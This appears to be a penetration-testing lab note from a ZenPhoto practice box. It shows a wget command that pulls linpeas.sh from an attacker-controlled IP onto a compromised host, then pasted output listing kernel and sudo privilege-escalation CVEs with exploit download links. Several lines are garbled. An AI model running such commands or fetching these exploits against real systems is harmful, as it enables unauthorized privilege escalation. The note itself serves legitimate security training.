PEAS
Conducting an automated enumeration after performing a manual enumeration
www-data@offsecsrv:/var/tmp$ wgwget -q http://192.168.45.192/linpeas.sh; chmod 755 ./linpeas.shDelivery complete
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{9F5D735E-847F-4271-B9BF-DADFA4F1B29E}.png)
Executing PEAS
CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: highly probable
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,[ ubuntu=10.04{kernel:2.6.32-21-generic} ],ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2010-3904] rds
Details: http://www.securityfocus.com/archive/1/514379
Exposure: highly probable
Tags: debian=6.0{kernel:2.6.(31|32|34|35)-(1|trunk)-amd64},ubuntu=10.10|9.10,fedora=13{kernel:2.6.33.3-85.fc13.i686.PAE},[ ubuntu=10.04{kernel:2.6.32-(21|24)-generic} ]
Download URL: http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
8|9|10|11,fedora,manjaro12|13|14|15|16|17|18|19|20|21 ],debian=7|
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: probable
Tags: ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)},[ ubuntu=10.04 ]{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2010-3848,CVE-2010-3850,CVE-2010-4073] half_nelson
Details: https://www.exploit-db.com/exploits/17787/
Exposure: probable
Tags: [ ubuntu=(10.04|9.10) ]{kernel:2.6.(31|32)-(14|21)-server}
Download URL: https://www.exploit-db.com/download/17787
[+] [CVE-2010-3437] pktcdvd
Details: https://www.exploit-db.com/exploits/15150/
Exposure: probable
Tags: [ ubuntu=10.04 ]
Download URL: https://www.exploit-db.com/download/15150
[+] [CVE-2010-3301] ptrace_kmod2
Details: https://www.exploit-db.com/exploits/15023/
Exposure: probable
Tags: debian=6.0{kernel:2.6.(32|33|34|35)-(1|2|trunk)-amd64},[ ubuntu=(10.04|10.10) ]{kernel:2.6.(32|35)-(19|21|24)-server}
Download URL: https://www.exploit-db.com/download/15023
[+] [CVE-2010-2959] can_bcm
Details: https://www.exploit-db.com/exploits/14814/
Exposure: probable
Tags: [ ubuntu=10.04 ]{kernel:2.6.32-24-generic}
Download URL: https://www.exploit-db.com/download/14814
[+] [CVE-2010-0832] PAM MOTD
Details: https://www.exploit-db.com/exploits/14339/
Exposure: probable
Tags: [ ubuntu=9.10|10.04 ]
Download URL: https://www.exploit-db.com/download/14339
Comments: SSH access to non privileged user is needed
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
xp.cownload URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/e
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
ithub.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2017-6074] dccp
Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: less probable
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-1000370,CVE-2017-1000371] linux_offset2lib
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
Comments: Uses "Stack Clash" technique
[+] [CVE-2017-1000366,CVE-2017-1000371] linux_ldso_dynamic
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
ost SUID-root PIEs"Stack Clash" technique, works against m
[+] [CVE-2017-1000366,CVE-2017-1000370] linux_ldso_hwcap
Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
Exposure: less probable
Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
[+] [CVE-2016-6663,CVE-2016-6664|CVE-2016-6662] mysql-exploit-chain
Details: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Exposure: less probable
Tags: ubuntu=16.04.1
Download URL: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
[+] [CVE-2014-5119] __gconv_translit_find
m/2014/08/the-poisoned-nul-byte-2014-edition.html
Exposure: less probable
Tags: debian=6
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34421.tar.gz
[+] [CVE-2014-0196] rawmodePTY
Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
Exposure: less probable
Download URL: https://www.exploit-db.com/download/33516
[+] [CVE-2013-2094] semtex
Details: http://timetobleed.com/a-closer-look-at-a-recent-privilege-escalation-bug-in-linux-cve-2013-2094/
Exposure: less probable
Tags: RHEL=6
Download URL: https://www.exploit-db.com/download/25444
[+] [CVE-2013-0268] msr
Details: https://www.exploit-db.com/exploits/27297/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/27297
[+] [CVE-2010-4347] american-sign-language
Details: https://www.exploit-db.com/exploits/15774/
Exposure: less probable
Download URL: https://www.exploit-db.com/download/15774
[+] [CVE-2010-3081] video4linux
Details: https://www.exploit-db.com/exploits/15024/
Exposure: less probable
Tags: RHEL=5
Download URL: https://www.exploit-db.com/download/15024
[+] [CVE-2010-1146] reiserfs
eiserfs_priv-vulnerability/rheide.org/blog/2010/04/10/reiserfs-r
Exposure: less probable
Tags: ubuntu=9.10
Download URL: https://jon.oberheide.org/files/team-edward.pyInstalled Programs
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{6013B42E-A834-4ACE-A38C-32E9D8B5CB17}.png)
Apache
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{DBE81D80-D7F0-4345-A3EE-FC0AE963ADD5}.png)
MySQL
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{0864F6C0-E055-4B19-9737-35128DA4C311}.png)
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{6B6C9E73-7F82-4949-94EB-492A53CF192E}.png)
SSH
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{4E7DC41D-8E61-47B2-97C5-CA1662BF89C7}.png)
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{8A225679-EDDC-4661-A197-A81BDF0607C3}.png)
SUID
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{636AEAD6-0C73-45D8-A56C-B6955CF0D591}.png)
SGID
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{B140F0AD-3070-4DA1-A9A8-6619C19C1D68}.png)
Interesting Files / Directories
/Practice/ZenPhoto/4-Post_Enumeration/attachments/{DB501335-CA24-4D05-B128-4678A0EE55A3}.png)